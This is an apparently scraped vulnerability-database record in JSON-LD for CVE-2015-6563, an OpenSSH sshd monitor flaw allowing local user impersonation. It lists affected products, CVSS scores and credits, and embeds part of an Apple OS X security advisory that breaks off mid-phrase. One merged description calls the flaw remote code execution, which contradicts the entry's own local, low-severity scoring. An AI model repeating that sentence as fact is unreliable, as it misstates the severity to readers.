Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201508-0112", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.0" }, { "model": "openssh", "scope": "lte", "trust": 1.0, "vendor": "openbsd", "version": "6.9" }, { "model": "openssh", "scope": "lt", "trust": 0.8, "vendor": "openbsd", "version": "7.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11" }, { "model": "mac os x", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "10.11.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.214" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.3" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.410" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.24" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.213" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.219" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3500-" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.113" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.6" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "10.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.22" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.7" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "nsm4000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.413" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3700-" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v5000-" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.36" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.21" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.5" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "security privileged identity manager fixpack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.28" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v7000" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.46" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.34" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.26" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.415" }, { "model": "solaris sru", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.35.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.412" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "openssh", "scope": "ne", "trust": 0.3, "vendor": "openssh", "version": "7.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.9" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.2" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2015" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.218" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.6" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7.0" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" } ], "sources": [ { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "6.9", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-6563" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Moritz Jodeit", "sources": [ { "db": "BID", "id": "76317" }, { "db": "CNNVD", "id": "CNNVD-201508-115" } ], "trust": 0.9 }, "cve": "CVE-2015-6563", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.4, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Local", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 1.9, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-6563", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.4, "id": "VHN-84524", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-6563", "trust": 1.8, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201508-504", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-84524", "trust": 0.1, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2015-6563", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. OpenSSH (OpenBSD Secure Shell) is a set of connection tools maintained by the OpenBSD project group for secure access to remote computers. This tool is an open source implementation of the SSH protocol, which supports encryption of all transmissions and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. \nA remote code execution vulnerability exists in OpenSSH. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may cause a denial of service. Failed exploit attempts may result in denial-of-service conditions. There is a security vulnerability in the monitor component in the sshd of OpenSSH 6.9 and earlier versions based on non-OpenBSD platforms. The vulnerability is caused by the program incorrectly receiving the external username data in the MONITOR_REQ_PAM_INIT_CTX request. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update\n2015-007\n\nOS X El Capitan 10.11.1 and Security Update 2015-007 are now\navailable and address the following:\n\nAccelerate Framework\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in the Accelerate\nFramework in multi-threading mode. This issue was addressed through\nimproved accessor element validation and improved object locking. \nCVE-ID\nCVE-2015-5940 : Apple\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Multiple vulnerabilities in PHP\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.29 and 5.4.45. These were addressed by updating PHP to\nversions 5.5.29 and 5.4.45. \nCVE-ID\nCVE-2015-0235\nCVE-2015-0273\nCVE-2015-6834\nCVE-2015-6835\nCVE-2015-6836\nCVE-2015-6837\nCVE-2015-6838\n\nATS\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted webpage may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in ATS. This issue\nwas addressed through improved memory handling. \nCVE-ID\nCVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team\n\nAudio\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode\nDescription: An uninitialized memory issue existed in coreaudiod. \nThis issue was addressed through improved memory initialization. \nCVE-ID\nCVE-2015-7003 : Mark Brand of Google Project Zero\n\nAudio\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Playing a malicious audio file may lead to arbitrary code\nexecution\nDescription: Multiple memory corruption issues existed in the\nhandling of audio files. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-5933 : Apple\nCVE-2015-5934 : Apple\n\nBom\nAvailable for: OS X El Capitan 10.11\nImpact: Unpacking a maliciously crafted archive may lead to\narbitrary code execution\nDescription: A file traversal vulnerability existed in the handling\nof CPIO archives. This issue was addressed through improved\nvalidation of metadata. \nCVE-ID\nCVE-2015-7006 : Mark Dowd of Azimuth Security\n\nCFNetwork\nAvailable for: OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to cookies\nbeing overwritten\nDescription: A parsing issue existed when handling cookies with\ndifferent letter casing. This issue was addressed through improved\nparsing. \nCVE-ID\nCVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of\nTsinghua University, Jian Jiang of University of California,\nBerkeley, Haixin Duan of Tsinghua University and International\nComputer Science Institute, Shuo Chen of Microsoft Research Redmond,\nTao Wan of Huawei Canada, Nicholas Weaver of International Computer\nScience Institute and University of California, Berkeley, coordinated\nvia CERT/CC\n\nconfigd\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to elevate privileges\nDescription: A heap based buffer overflow issue existed in the DNS\nclient library. \nCVE-ID\nCVE-2015-7015 : PanguTeam\n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in\nCoreGraphics. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5925 : Apple\nCVE-2015-5926 : Apple\n\nCoreText\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team\n\nDisk Images\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the parsing of\ndisk images. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-6995 : Ian Beer of Google Project Zero\n\nEFI\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: An attacker can exercise unused EFI functions\nDescription: An issue existed with EFI argument handling. This was\naddressed by removing the affected functions. \nCVE-ID\nCVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and\nSam Cornwell of The MITRE Corporation, coordinated via CERT/CC\n\nFile Bookmark\nAvailable for: OS X El Capitan 10.11\nImpact: Browsing to a folder with malformed bookmarks may cause\nunexpected application termination\nDescription: An input validation issue existed in parsing bookmark\nmetadata. This issue was addressed through improved validation\nchecks. \nCVE-ID\nCVE-2015-6987 : Luca Todesco (@qwertyoruiop)\n\nFontParser\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El 